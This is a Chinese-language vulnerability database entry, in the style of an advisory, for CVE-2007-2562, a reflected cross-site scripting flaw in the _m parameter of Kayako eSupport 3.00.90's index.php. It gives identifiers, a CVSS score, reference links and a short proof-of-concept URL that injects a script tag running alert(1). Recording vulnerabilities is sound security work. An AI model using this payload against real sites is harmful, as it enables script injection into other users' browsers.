Kayako eSupport 'index.php'_m参数跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1190643 漏洞类型 跨站脚本
发布时间 2007-05-09 更新时间 2007-05-09
CVE编号 CVE-2007-2562 CNNVD-ID CNNVD-200705-186
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://www.securityfocus.com/bid/81770
https://cxsecurity.com/issue/WLB-2007050038
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-186
|漏洞详情
KayakoeSupport的index.php中存在跨站脚本攻击漏洞。远程攻击者可以借助_m参数,注入任意的web脚本或HTML。
|漏洞EXP
Script: Kayako eSupport
Version: 3.00.90 
Explored By: Red_Casper [United Arab HaCkers]
Proof:
[Path]/index.php?_m="><script>alert(1);</script>
|受影响的产品
Kayako eSupport 3.0.90
|参考资料

来源:XF
名称:kayako-esupport-index-xss(34144)
链接:http://xforce.iss.net/xforce/xfdb/34144
来源:BUGTRAQ
名称:20070507KayakoeSupportv3.00.90CrossSiteScripting(XSS)
链接:http://www.securityfocus.com/archive/1/archive/1/467832/100/0/threaded
来源:OSVDB
名称:36166
链接:http://osvdb.org/36166
来源:SREASON
名称:2684
链接:http://securityreason.com/securityalert/2684